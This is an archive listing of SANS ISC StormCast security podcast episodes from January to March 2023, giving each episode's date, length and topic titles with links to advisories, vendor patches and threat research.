3/21/2023, 5 minutes, 11 seconds

ISC StormCast for Monday, March 20th, 2023

Old Backdoor, New Obfuscation https://isc.sans.edu/diary/Old%20Backdoor%2C%20New%20Obfuscation/29646 Samsung Exynos Chip Vulnerability https://googleprojectzero.blogspot.com/2023/03/multiple-internet-to-baseband-remote-rce.html Android Image Cropping Problem https://twitter.com/ItsSimonTime/status/1636857478263750656/photo/1 https://acropalypse.app/ Bitwarden Pins https://ambiso.github.io/bitwarden-pin/
3/20/2023, 6 minutes, 47 seconds

ISC StormCast for Friday, March 17th, 2023

Simple Shellcode Dissection https://isc.sans.edu/diary/Simple%20Shellcode%20Dissection/29642 Threat Actors Exploit Progress Telerik Vulnerability https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a Abusing Adobe Acrobat Sign to Distribute Malware https://blog.avast.com/adobe-acrobat-sign-malware Zoom Patches https://explore.zoom.us/en/trust/security/security-bulletin/ Array Networks Advisory https://support.arraynetworks.net/prx/001/http/supportportal.arraynetworks.net/documentation/FieldNotice/Array_Networks_Security_Advisory_for_Remote_Code_Execution_Vulnerability_AG.pdf Aruba Patches https://www.arubanetworks.com/support-services/security-bulletins/
3/17/2023, 7 minutes, 12 seconds

ISC StormCast for Thursday, March 16th, 2023

IPFS Phishing and the need for correctly set HTTP security headers https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638
Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
CVE-2023-23415 ICMP RCE https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23415
Chromium Certificate Proposals https://www.chromium.org/Home/chromium-security/root-ca-policy/moving-forward-together/
3/16/2023, 6 minutes, 36 seconds

ISC StormCast for Wednesday, March 15th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20March%202023%20Patch%20Tuesday/29634
Adobe ColdFusion and Magento (Adobe Commerce) patches https://helpx.adobe.com/security/products/magento/apsb23-17.html https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-09/
3/15/2023, 6 minutes, 25 seconds

ISC StormCast for Tuesday, March 14th, 2023

SVB Scams and New Domain Registrations https://isc.sans.edu/diary/Incoming%20Silicon%20Valley%20Bank%20Related%20Scams/29630
CISA Adds Older Plex and VMware Vulnerabilities to Known-Exploited List https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-plex-bug-after-lastpass-breach/
FortiOS Vulnerability Exploited https://www.fortiguard.com/psirt/FG-IR-22-369
3/14/2023, 5 minutes, 18 seconds

ISC StormCast for Monday, March 13th, 2023

AsyncRAT Trojan - Bill Payment (Pago de la factura) https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626
Mirai Payload Generator https://isc.sans.edu/diary/Overview%20of%20a%20Mirai%20Payload%20Generator/29624
Multi-Technology Script Leading to Browser Hijacking https://isc.sans.edu/diary/Multi-Technology%20Script%20Leading%20to%20Browser%20Hijacking/29620
OneNote will warn users of embedded content https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=OneNote%2CIn%20development&searchterms=122277
Google Removing Chrome Cleanup Tool https://security.googleblog.com/2023/03/thank-you-and-goodbye-to-chrome-cleanup.html
3/13/2023, 5 minutes, 41 seconds

ISC StormCast for Friday, March 10th, 2023

Suspected Chinese Campaign to Persist on SonicWall Devices https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall
Old Cyber Gang Uses New Crypter - ScrubCrypt https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt
Home Assistant Supervisor Security Vulnerability https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/
Fake ChatGPT Chrome Extensions https://www.helpnetsecurity.com/2023/03/09/fake-chatgpt-extension/
Criminals Steal Cryptocurrency through Play-to-Earn Games https://www.ic3.gov/Media/Y2023/PSA230309
3/10/2023, 6 minutes, 23 seconds

ISC StormCast for Thursday, March 9th, 2023

Increase in exploits against Joomla (CVE-2023-23752) https://isc.sans.edu/diary/Increase%20in%20exploits%20agains%20Joomla%20%28CVE-2023-23752%29/29614
Jenkins RCE Vulnerability https://blog.aquasec.com/jenkins-server-vulnerabilities
Bitwarden: The Curious Use-Case of Password Pilfering https://flashpoint.io/blog/bitwarden-password-pilfering/
FortiOS Vulnerabilities https://www.fortiguard.com/psirt/FG-IR-23-001
Veeam Backup Vulnerabilities https://www.veeam.com/kb4245
3/9/2023, 6 minutes, 23 seconds

ISC StormCast for Wednesday, March 8th, 2023

Hackers Love This VSCode Extension: What You Can Do to Stay Safe https://isc.sans.edu/diary/Hackers%20Love%20This%20VSCode%20Extension%3A%20What%20You%20Can%20Do%20to%20Stay%20Safe/29610
Protecting Android Clipboard Content from Unintended Exposure https://www.microsoft.com/en-us/security/blog/2023/03/06/protecting-android-clipboard-content-from-unintended-exposure/
SYS01 Stealer Targeting Facebook Accounts https://blog.morphisec.com/sys01stealer-facebook-info-stealer
3/8/2023, 5 minutes, 40 seconds

ISC StormCast for Tuesday, March 7th, 2023

Scanning S3 Buckets https://isc.sans.edu/diary/Scanning%20s3%20buckets/29606
HiatusRAT Router Malware https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/
SonicWall Vulnerability https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004
Microsoft Word RTF RCE Proof-of-Concept (CVE-2023-21716) https://twitter.com/jduck/status/1632471544935923712 https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md
DBatLoader and Remcos RAT https://www.sentinelone.com/blog/dbatloader-and-remcos-rat-sweep-eastern-europe/
3/7/2023, 5 minutes, 6 seconds

ISC StormCast for Monday, March 6th, 2023

SANS.edu Commencement https://www.linkedin.com/feed/update/urn:li:activity:7037794067266625536/
SCARLETEEL: Operation Leveraging Terraform, Kubernetes and AWS for Data Theft https://sysdig.com/blog/cloud-breach-terraform-data-theft/
Preventing Malicious OneNote Files https://www.bleepingcomputer.com/news/security/how-to-prevent-microsoft-onenote-files-from-infecting-windows-with-malware/
Redis Miner Leverages Command Line File Hosting Service https://www.cadosecurity.com/redis-miner-leverages-command-line-file-hosting-service/
3/6/2023, 5 minutes, 6 seconds

ISC StormCast for Friday, March 3rd, 2023

YARA: Detect the Unexpected https://isc.sans.edu/diary/YARA%3A%20Detect%20The%20Unexpected%20.../29598
Drone Security and the Mysterious Case of DJI's DroneID https://github.com/RUB-SysSec/DroneSecurity
Booking.com OAuth Flaw https://salt.security/blog/traveling-with-oauth-account-takeover-on-booking-com
SANS.edu Student Marco Gfeller: Lightweight Python-Based Malware Analysis Pipeline https://www.sans.org/white-papers/lightweight-python-based-malware-analysis-pipeline/
3/3/2023, 14 minutes, 14 seconds

ISC StormCast for Thursday, March 2nd, 2023

Python Infostealer Targeting Gamers https://isc.sans.edu/diary/Python%20Infostealer%20Targeting%20Gamers/29596
DNS Abuse Techniques Matrix https://www.first.org/global/sigs/dns/DNS-Abuse-Techniques-Matrix_v1.1.pdf
BlackLotus UEFI Bootkit https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
TCG TPM 2.0 implementations vulnerable to memory corruption https://kb.cert.org/vuls/id/782720
Aruba Vulnerability https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-002.txt
Cisco VoIP Phone WebUI RCE https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-cmd-inj-KMFynVcP
3/2/2023, 5 minutes, 40 seconds

ISC StormCast for Wednesday, March 1st, 2023

BB17 Distribution Qakbot (Qbot) Activity https://isc.sans.edu/diary/BB17%20distribution%20Qakbot%20%28Qbot%29%20activity/29592
LastPass Incident Details https://support.lastpass.com/help/incident-1-additional-details-of-the-attack https://support.lastpass.com/help/incident-2-additional-details-of-the-attack
CISA Red Team Shares Key Findings https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a
Jailbreak Chat https://www.jailbreakchat.com
3/1/2023, 6 minutes, 5 seconds

ISC StormCast for Tuesday, February 28th, 2023

Phishing Again and Again https://isc.sans.edu/diary/Phishing%20Again%20and%20Again/29588
Unlocked Phone Stealing https://www.wsj.com/articles/apple-iphone-security-theft-passcode-data-privacya-basic-iphone-feature-helps-criminals-steal-your-digital-life-cbf14b1a
More Fake Authenticator Apps https://nakedsecurity.sophos.com/2023/02/27/beware-rogue-2fa-apps-in-app-store-and-google-play-dont-get-hacked/
ZoneMinder Vulnerability https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
WebLogic Exploit (not verified) CVE-2023-21839 https://github.com/4ra1n/CVE-2023-21839/blob/master/cmd/main.go
2/28/2023, 5 minutes, 17 seconds

ISC StormCast for Monday, February 27th, 2023

URL Files and WebDAV used for IcedID (Bokbot) Infection https://isc.sans.edu/diary/URL%20files%20and%20WebDAV%20used%20for%20IcedID%20%28Bokbot%29%20infection/29578
oledump & MSI Files https://isc.sans.edu/diary/oledump%20%26%20MSI%20Files/29584
Automatic Disruption of Ransomware and BEC Attacks with Microsoft 365 Defender https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294
Cisco Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-csrfv-DMx6KSwV https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-lldp-dos-ySCNZOpX
2/27/2023, 6 minutes, 24 seconds

ISC StormCast for Friday, February 24th, 2023

Updated Exchange AV Guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/update-on-the-exchange-server-antivirus-exclusions/ba-p/3751464
Best Practices for Securing Your Home Network https://media.defense.gov/2023/Feb/22/2003165170/-1/-1/0/CSI_BEST_PRACTICES_FOR_SECURING_YOUR_HOME_NETWORK.PDF
Attacks on Data Center Organizations https://www.resecurity.com/blog/article/cyber-attacks-on-data-center-organizations
NPM Package Phishing https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/
Malicious PyPI Packages https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-new-malicious-python-packages-in-pypi
2/24/2023, 5 minutes, 24 seconds

ISC StormCast for Thursday, February 23rd, 2023

Internet Wide Scan Fingerprinting Confluence Servers https://isc.sans.edu/diary/Internet%20Wide%20Scan%20Fingerprinting%20Confluence%20Servers/29574
Apple Updates / Advisories https://support.apple.com/en-us/HT213606 https://support.apple.com/en-us/HT213605 https://www.trellix.com/en-us/about/newsroom/stories/research/trellix-advanced-research-center-discovers-a-new-privilege-escalation-bug-class-on-macos-and-ios.html
Questionable Two-Factor Apps https://twitter.com/mysk_co/status/1627097291063435264
VMware Carbon Black App Control Vulnerability https://www.vmware.com/security/advisories/VMSA-2023-0004.html
2/23/2023, 5 minutes, 36 seconds

ISC StormCast for Wednesday, February 22nd, 2023

Phishing Page Branded with Your Corporate Website https://isc.sans.edu/diary/Phishing%20Page%20Branded%20with%20Your%20Corporate%20Website/29570
Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
Apache Commons FileUpload Vulnerability https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy
VMware ESXi Fix for Windows Server 2022 https://docs.vmware.com/en/VMware-vSphere/7.0/rn/vsphere-esxi-70u3k-release-notes.html#resolvedissues
2/22/2023, 4 minutes, 56 seconds

ISC StormCast for Tuesday, February 21st, 2023

OneNote Suricata Rules https://isc.sans.edu/diary/OneNote%20Suricata%20Rules/29564
New IIS Backdoor https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
Outlook Spam https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-flooded-with-spam-due-to-broken-email-filters/
GoDaddy Breach and Website Redirects https://aboutus.godaddy.net/newsroom/company-news/news-details/2023/Statement-on-recent-website-redirect-issues/default.aspx
2/21/2023, 5 minutes, 46 seconds

ISC StormCast for Monday, February 20th, 2023

Spear Phishing Emails to our Handlers' Inbox https://isc.sans.edu/diary/Spear%20Phishing%20Handlers%20for%20Username%20Password/29560
Twitter Alters 2FA https://blog.twitter.com/en_us/topics/product/2023/an-update-on-two-factor-authentication-using-sms-on-twitter
Fortinet Updates https://www.fortiguard.com/psirt-monthly-advisory/february-2023-vulnerability-advisories https://twitter.com/Horizon3Attack/status/1626692778062237713
Cisco ClamAV Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-q8DThCy
2/20/2023, 5 minutes, 46 seconds

ISC StormCast for Friday, February 17th, 2023

HTML Phishing Attachment with Browser-in-the-Browser Technique https://isc.sans.edu/diary/HTML%20phishing%20attachment%20with%20browser-in-the-browser%20technique/29556
Windows Server 2022 Might Not Start Up After Updates https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#windows-server-2022-might-not-start-up
New ESXiArgs Encryption Routine Outmaneuvers Recovery Methods https://www.malwarebytes.com/blog/news/2023/02/new-esxiargs-encryption-routine-outmaneuvers-recovery-methods
PHP Updates https://www.php.net
ClamAV Patches https://blog.clamav.net/2023/02/clamav-01038-01052-and-101-patch.html
2/17/2023, 5 minutes, 18 seconds

ISC StormCast for Thursday, February 16th, 2023

DNS Recon Redux https://isc.sans.edu/diary/DNS%20Recon%20Redux%20-%20Zone%20Transfers%20%28plus%20a%20time%20machine%29%20for%20When%20You%20Can%27t%20do%20a%20Zone%20Transfer/29552
GitHub Copilot Update https://github.blog/2023-02-14-github-copilot-now-has-a-better-ai-model-and-new-capabilities/
Hyundai Software Update https://www.hyundaiantitheft.com
Citrix Patches CVE-2023-24486, CVE-2023-24484, CVE-2023-24485, and CVE-2023-24483 https://www.cisa.gov/uscert/ncas/current-activity/2023/02/14/citrix-releases-security-updates-workspace-apps-virtual-apps-and
HAProxy Patch CVE-2023-25725 https://www.mail-archive.com/[email protected]/msg43229.html
Firefox Patches https://www.mozilla.org/en-US/security/advisories/mfsa2023-05/
2/16/2023, 5 minutes, 33 seconds

ISC StormCast for Wednesday, February 15th, 2023

Microsoft February 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202023%20Patch%20Tuesday/29548
Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
Intel OpenBMC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00737.html
2/15/2023, 6 minutes, 11 seconds

ISC StormCast for Tuesday, February 14th, 2023

Apple Patches Exploited Vulnerability https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerability/29544
Venmo Phishing Abusing LinkedIn "slink" https://isc.sans.edu/diary/Venmo+Phishing+Abusing+LinkedIn+slink/29542/
Malicious PyPI Packages Install Browser Extensions https://blog.phylum.io/phylum-discovers-revived-crypto-wallet-address-replacement-attack
2/14/2023, 5 minutes, 55 seconds

ISC StormCast for Monday, February 13th, 2023

Obfuscated Deactivation of Script Block Logging https://isc.sans.edu/diary/Obfuscated%20Deactivation%20of%20Script%20Block%20Logging/29538
PCAP Data Analysis with Zeek https://isc.sans.edu/diary/PCAP%20Data%20Analysis%20with%20Zeek/29530
Bing Chat Prompt Injection https://arstechnica.com/information-technology/2023/02/ai-powered-bing-chat-spills-its-secrets-via-prompt-injection-attack/
More Malicious Python Packages https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
2/13/2023, 5 minutes, 13 seconds

ISC StormCast for Friday, February 10th, 2023

A Backdoor with Smart Screenshot Capability https://isc.sans.edu/diary/A%20Backdoor%20with%20Smart%20Screenshot%20Capability/29534
KeePass Patches Issue Allowing Password Export https://keepass.info/news/n230109_2.53.html
AWS Phishing via Google Ads https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/
Apache Kafka Vulnerability https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
2/10/2023, 5 minutes, 24 seconds

ISC StormCast for Thursday, February 9th, 2023

Simple HTML Phishing via Telegram Bot https://isc.sans.edu/forums/diary/Simple%20HTML%20Phishing%20via%20Telegram%20Bot/29528/
Recovering from ESXiArgs Ransomware https://www.cisa.gov/uscert/ncas/alerts/aa23-039a
NIST Standardizes Lightweight Cryptography https://csrc.nist.gov/Projects/lightweight-cryptography
SonicWall Web Content Filtering on Windows 11 22H2 https://www.sonicwall.com/support/product-notification/limitation-with-web-content-filtering-on-windows-11-22h2/230208075107457/
Google Chrome Release Changes https://developer.chrome.com/blog/early-stable/
2/9/2023, 5 minutes, 44 seconds

ISC StormCast for Wednesday, February 8th, 2023

A Survey of Bluetooth Vulnerabilities Trends https://isc.sans.edu/diary/A%20Survey%20of%20Bluetooth%20Vulnerabilities%20Trends%20%282023%20Edition%29/29522 OpenSSL Vulnerabilities / Patches https://www.openssl.org/news/secadv/20230207.txt Packet Tuesday: Most Frequent DNS Query ID / DNS Notify https://www.youtube.com/watch?v=QgCuE_zKyMY GoAnywhere MFT Patch Available (and PoC) https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html https://my.goanywhere.com/webclient/Dashboard.xhtml Qakbot Mechanizes Distribution of Malicious OneNote Notebooks https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/
2/8/2023, 6 minutes, 32 seconds

ISC StormCast for Tuesday, February 7th, 2023

Earthquake Scams https://isc.sans.edu/diary/Earthquake%20in%20Turkey%20and%20Syria%3A%20Be%20Aware%20of%20Possible%20Donation%20Scams/29518 APIs Used By Bots to Detect Public IP Addresses https://isc.sans.edu/diary/APIs+Used+by+Bots+to+Detect+Public+IP+address/29516/ OpenSSH Vulnerability Details CVE-2023-25136 https://blog.qualys.com/vulnerabilities-threat-research/2023/02/03/cve-2023-25136-pre-auth-double-free-vulnerability-in-openssh-server-9-1 A Novel State-of-the-Art Redis Malware https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware?&web_view=true
2/7/2023, 6 minutes, 36 seconds

ISC StormCast for Monday, February 6th, 2023

Assemblyline as a Malware Analysis Sandbox https://isc.sans.edu/diary/Assemblyline%20as%20a%20Malware%20Analysis%20Sandbox/29510 GoAnywhere MFT zero-day Exploited https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ Ransomware targeting VMware ESXi https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/ Jira Service Management Server and Data Center Advisory CVE-2023-22501 https://confluence.atlassian.com/jira/jira-service-management-server-and-data-center-advisory-cve-2023-22501-1188786458.html OpenSSH Update https://www.openssh.com/releasenotes.html F5 BigIP Vulnerability CVE-2023-22374 https://my.f5.com/manage/s/article/K000130415
2/6/2023, 5 minutes, 26 seconds

ISC StormCast for Friday, February 3rd, 2023

Rotating Packet Captures with pfSense https://isc.sans.edu/diary/Rotating%20Packet%20Captures%20with%20pfSense/29500 BEC Group Incorporates Secondary Impersonated Personas https://intelligence.abnormalsecurity.com/blog/firebrick-ostrich-third-party-reconnaissance-attacks MalVirt .Net Virtualization Thrives in Malvertising Attacks https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/ Cisco Remote Code Execution with Persistence https://www.trellix.com/en-us/about/newsroom/stories/research/when-pwning-cisco-persistence-is-key-when-pwning-supply-chain-cisco-is-key.html
2/3/2023, 4 minutes, 58 seconds

ISC StormCast for Thursday, February 2nd, 2023

Detecting Malicious OneNote Files https://isc.sans.edu/diary/Detecting%20%28Malicious%29%20OneNote%20Files/29494 Microsoft Defender Device Isolation for Linux https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-device-isolation-support-for-linux/ba-p/3676400 SH1MMER Exploit for Chromebooks https://sh1mmer.me DOMPDF SVG Parsing Vulnerability https://github.com/dompdf/dompdf/security/advisories/GHSA-3cw5-7cxw-v5qg
2/2/2023, 6 minutes, 14 seconds

ISC StormCast for Wednesday, February 1st, 2023

DShield Honeypot Setup with pfSense https://isc.sans.edu/diary/DShield%20Honeypot%20Setup%20with%20pfSense/29490 Threat Actors Abusing Microsoft's "Verified Publisher" Status https://www.proofpoint.com/us/blog/cloud-security/dangerous-consequences-threat-actors-abusing-microsofts-verified-publisher PoS Malware Can Block Contactless Payments https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/ Detecting Files Exempt from Anti Malware Scans https://github.com/bananabr/TimeException
2/1/2023, 7 minutes, 43 seconds

ISC StormCast for Tuesday, January 31st, 2023

Decoding DNS over HTTP(s) Requests https://isc.sans.edu/diary/Decoding%20DNS%20over%20HTTP%28s%29%20Requests/29488 Action Needed for GitHub Desktop and Atom Users https://github.blog/2023-01-30-action-needed-for-github-desktop-and-atom-users/ GitHub Checksum Mismatches for .tar.gz Files https://github.com/orgs/community/discussions/45830 Facebook 2FA Bypass https://medium.com/pentesternepal/two-factor-authentication-bypass-on-facebook-3f4ac3ea139c Fortinet Exploit https://wzt.ac.cn/2022/12/15/CVE-2022-42475/ QNAP Vulnerability https://www.qnap.com/en/security-advisory/qsa-23-01
1/31/2023, 7 minutes, 13 seconds

ISC StormCast for Monday, January 30th, 2023

Microsoft Tips to Patch Your Exchange Servers https://techcommunity.microsoft.com/t5/exchange-team-blog/protect-your-exchange-servers/ba-p/3726001 FCC Threatens to Take Action Against Twilio over Robocalls https://www.fcc.gov/document/fcc-takes-mortgage-scam-robocall-campaign-targeting-homeowners PlugX Variant Spreads via USB https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/ Adware in Google Play Store https://news.drweb.com/show/review/?lng=en&i=14652 Tails 5.9 Update https://tails.boum.org/news/version_5.9/index.de.html
1/30/2023, 5 minutes, 52 seconds

ISC StormCast for Friday, January 27th, 2023

Live Linux IR with UAC https://isc.sans.edu/diary/Live%20Linux%20IR%20with%20UAC/29480 Bitwarden Phishing https://community.bitwarden.com/t/phishing-website-bitwardenlogin-com/49704 https://www.reddit.com/r/Bitwarden/comments/10k2aj5/google_search_ads_showing_fake_bitwarden_web/ PY#RATION Attack Campaign Leverages Fernet Encryption and Websockets https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/ Skyhigh Security Secure Web Gateway: XSS in Single Sign On Plugin https://www.redteam-pentesting.de/en/advisories/rt-sa-2022-002/-skyhigh-security-secure-web-gateway-cross-site-scripting-in-single-sign-on-plugin Windows Crypto API Vuln PoC https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689 BIND Patches https://kb.isc.org/docs/cve-2022-3094
1/27/2023, 6 minutes, 15 seconds

ISC StormCast for Thursday, January 26th, 2023

First Malicious OneNote Document https://isc.sans.edu/diary/A%20First%20Malicious%20OneNote%20Document/29470 Guidance for Securing Remote Monitoring and Management Software https://media.defense.gov/2023/Jan/25/2003149873/-1/-1/0/JOINT_CSA_RMM.PDF Microsoft Azure-Based Kerberos Attacks Crack Open Cloud Accounts https://www.darkreading.com/cloud/microsoft-azure-kerberos-attacks-open-cloud-accounts Microsoft Blocking XLL Files Downloaded From Internet https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=115485 Lexmark Vulnerabilities https://publications.lexmark.com/publications/security-alerts/CVE-2023-23560.pdf VMware vRealize Update https://www.vmware.com/security/advisories/VMSA-2023-0001.html
1/26/2023, 5 minutes, 46 seconds

ISC StormCast for Wednesday, January 25th, 2023

Apple Patch Summary https://isc.sans.edu/forums/diary/Apple%20Updates%20%28almost%29%20Everything%3A%20Patch%20Overview/29472/ ManageEngine News https://github.com/vonahisec/CVE-2022-47966-Scan KSMBD Vulnerability https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow/ BitWarden Server Side Iterations https://palant.info/2023/01/23/bitwarden-design-flaw-server-side-iterations/ Packet Tuesday: Neighbor Advertisements https://www.youtube.com/watch?v=CoaZjuuY1do
1/25/2023, 6 minutes, 49 seconds

ISC StormCast for Tuesday, January 24th, 2023

Who's Resolving This Domain https://isc.sans.edu/forums/diary/Who's%20Resolving%20This%20Domain%3F/29462/ Apple Updates Everything https://support.apple.com/en-us/HT201222 NSA IPv6 Security Guidance https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF Roaming Mantis Implements new DNS Changer in its malicious mobile app https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html
1/24/2023, 5 minutes, 44 seconds

ISC StormCast for Monday, January 23rd, 2023

Importance of Signing in Windows Environments https://isc.sans.edu/diary/Importance%20of%20signing%20in%20Windows%20environments/29456 FanDuel Discloses Data Breach Caused by Recent Mailchimp Hack https://www.bleepingcomputer.com/news/security/fanduel-discloses-data-breach-caused-by-recent-mailchimp-hack/ OneNote Documents Used to Embed Malicious Office Documents https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/ Cisco Unified Communications Manager SQL Injection https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-sql-rpPczR8n Possible KeePass Vulnerability https://twitter.com/vomanc/status/1617135599030530054
1/23/2023, 6 minutes, 26 seconds

ISC StormCast for Friday, January 20th, 2023

SPF and DMARC use on 100k most popular domains https://isc.sans.edu/diary/SPF%20and%20DMARC%20use%20on%20100k%20most%20popular%20domains/29452 Sysmon Exploit Released CVE-2022-41120, CVE-2022-44704 https://github.com/Wh04m1001/SysmonEoP ManageEngine CVE-2022-47966 Technical Deep Dive https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ Netcomm Router Vulnerabilities https://kb.cert.org/vuls/id/986018 Microsoft Pushes Outdated Office Install Check https://www.bleepingcomputer.com/news/microsoft/microsoft-pushes-kb5021751-to-check-for-outdated-office-installs/
1/20/2023, 5 minutes, 35 seconds

ISC StormCast for Thursday, January 19th, 2023

Malicious Google Ads for Fake Notepad++ Lead to Aurora Stealer https://isc.sans.edu/diary/Malicious%20Google%20Ad%20--%3E%20Fake%20Notepad%2B%2B%20Page%20--%3E%20Aurora%20Stealer%20malware/29448 Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2023.html QT QML Vulnerability https://blog.talosintelligence.com/vulnerability-spotlight-integer-and-buffer-overflow-vulnerabilities-found-in-qt-qml/ sudo sudoedit vulnerability https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
1/19/2023, 6 minutes, 19 seconds

ISC StormCast for Wednesday, January 18th, 2023

Finding that one GPO setting in a pool of hundreds of GPOs https://isc.sans.edu/diary/Finding%20that%20one%20GPO%20Setting%20in%20a%20Pool%20of%20Hundreds%20of%20GPOs/29442 GIT Code Audit https://x41-dsec.de/security/research/news/2023/01/17/git-security-audit-ostif/ Azure SSRF Flaws https://orca.security/resources/blog/ssrf-vulnerabilities-in-four-azure-services/ SMB Insecure Guest Auth Off By Default In Windows 11 Pro https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb-insecure-guest-auth-now-off-by-default-in-windows-insider/ba-p/3715014 Packet Tuesday: IPv6 Router Advertisements https://www.youtube.com/watch?v=uRWpB_lYIZ8
1/18/2023, 5 minutes, 50 seconds

ISC StormCast for Tuesday, January 17th, 2023

PSA: Why you must run an ad blocker when using Google https://isc.sans.edu/diary/PSA%3A%20Why%20you%20must%20run%20an%20ad%20blocker%20when%20using%20Google/29438 NortonLifeLock Password Manager Bruteforcing https://webcache.googleusercontent.com/search?q=cache%3A91Bmx_jTJIkJ%3Ahttps%3A%2F%2Fago.vermont.gov%2Fwp-content%2Fuploads%2F2023%2F01%2F2023-01-09-NortonLifeLock-Gen-Digital-Data-Breach-Notice-to-Consumers.pdf&cd=3&hl=de&ct=clnk&gl=de CVE-2023-0179 Linux kernel stack buffer overflow in nftables: PoC and writeup https://seclists.org/oss-sec/2023/q1/20 MSI (in)Secure Boot https://dawidpotocki.com/en/2023/01/13/msi-insecure-boot/
1/17/2023, 6 minutes, 17 seconds

ISC StormCast for Monday, January 16th, 2023

Elon Musk Themed Crypto Scams Flooding YouTube Today https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 Microsoft Text to Speech Synthesizer https://arxiv.org/pdf/2301.02111.pdf Missing Windows Start Menu https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22H2#2998msgdesc
1/16/2023, 5 minutes, 9 seconds

ISC StormCast for Friday, January 13th, 2023

Prowler v3: AWS & Azure security assessments https://isc.sans.edu/diary/Prowler%20v3%3A%20AWS%20%26%20Azure%20security%20assessments/29430 Certified Pre-Pw0ned Android TV https://github.com/DesktopECHO/T95-H616-Malware Revolte Attack https://revolte-attack.net NGFW Data Exfiltration https://cymulate.com/blog/data-exfiltration-firewall/
1/13/2023, 6 minutes, 59 seconds

ISC StormCast for Thursday, January 12th, 2023

